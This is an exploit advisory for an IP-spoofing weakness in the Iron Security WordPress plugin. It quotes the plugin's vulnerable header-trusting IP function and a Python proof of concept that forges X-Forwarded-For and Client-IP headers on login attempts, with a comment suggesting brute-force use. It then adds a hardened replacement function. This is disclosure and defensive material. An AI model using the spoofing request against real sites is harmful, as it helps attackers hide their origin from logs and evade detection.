# Wordpress Plugin Iron Security - IP Spoofing
# Exploit Author: bRpsd | cy[at]live.no
# Date: March 20, 2025
# Product: https://wordpress.org/plugins/iron-security/
# Version: 2.2.3 and below
# CVE : N/A
Summary:
Iron Security is the ultimate WordPress security plugin built to secure and harden your website with essential protection features. Whether you're a blogger, business owner, or developer, Iron Security helps keep your site safe from attacks and unauthorized access. With a user-friendly interface and effective tools such as a custom login URL and HTTP security headers, Iron Security is the all-in-one solution for WordPress security.
The plugin logs successful and failed login attempts, along with other actions made by users, to a log table in the database; the logged data includes the client IP. However, it uses weak logic to determine that IP, so the recorded address can be a spoofed value rather than the original one, which makes detection easier to evade.
PHP function logic:
==========================================================================================
private static function get_client_ip() {
    $ip = '0.0.0.0';
    // Check for shared internet/ISP IP
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    // Check for IPs passing through proxies
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Check if multiple IPs
        $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($ips as $ip_address) {
            $ip_address = trim($ip_address);
            if (self::validate_ip($ip_address)) {
                $ip = $ip_address;
                break;
            }
        }
    }
    // Check for the remote address
    elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
==========================================================================================
Risk:
The plugin retrieves the client IP address from untrusted request headers such as X-Forwarded-For and Client-IP, so a sender can set the value arbitrarily. This can be used to hide the true source of malicious traffic. Below is a simple Python example that performs a failed login attempt with a spoofed IP; the spoofed address is what gets logged in the database and system, because of insufficient IP address validation and the use of user-supplied HTTP headers as the primary method of IP retrieval.
=======
POC
=======
import requests

# Target URL for login [can be other functions that get logged as well]
url = "http://localhost/wordpress/wp-login.php"

# Spoofed IP address
spoofed_ip = "1.1.1.1"

# In this example a failed login is used; in a real scenario brute-force logic could be here
username = "test"
password = "test"

# Headers with spoofed IP
headers = {
    "User-Agent": "Mozilla/5.0",
    "X-Forwarded-For": spoofed_ip,
    "Client-IP": spoofed_ip
}

# Login data
data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}

# Send the login request
response = requests.post(url, headers=headers, data=data)

# Check the response
print("Status Code:", response.status_code)
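A hardened replacement for get_client_ip(), added here as an example and not the plugin's own code: forwarding headers are only honoured when REMOTE_ADDR is one of the site's own reverse proxies, and the addresses in $trustedProxies and the two sample requests are constructed for illustration.

```php
<?php
// Added example (not Iron Security's code): trust X-Forwarded-For only when the
// request arrives from a known reverse proxy; otherwise log REMOTE_ADDR.
// Every IP value below is constructed for illustration.

function is_public_ip(string $ip): bool {
    // Reject malformed strings and private/reserved ranges.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function get_client_ip(array $server, array $trustedProxies): string {
    // REMOTE_ADDR is taken by the web server from the TCP connection, not from a
    // request header, so it is always consulted and cannot be set by the sender.
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (!in_array($remote, $trustedProxies, true)) {
        // Direct connection: X-Forwarded-For and Client-IP are sender-controlled, ignore them.
        return $remote;
    }
    // The peer is our proxy, which appends the address it saw to X-Forwarded-For.
    // Walk the list from the right, skip our own proxies, and take the first other hop.
    // Client-IP is never read: nothing in our chain sets it.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if ($hops[$i] === '' || in_array($hops[$i], $trustedProxies, true)) {
            continue;
        }
        return is_public_ip($hops[$i]) ? $hops[$i] : '0.0.0.0';
    }
    return $remote; // header missing, or it listed only our own proxies
}

$trusted = ['10.0.0.5']; // constructed: the single reverse proxy in front of the site

// The PoC request arriving directly: the spoofed headers are ignored.
$direct = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1',
    'HTTP_CLIENT_IP'       => '1.1.1.1',
];
// The same request via our proxy, which appended the real peer after the spoofed value.
$proxied = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 203.0.113.7',
];
echo get_client_ip($direct, $trusted), "\n";   // the real peer, not the header value
echo get_client_ip($proxied, $trusted), "\n";  // the hop our proxy actually observed
```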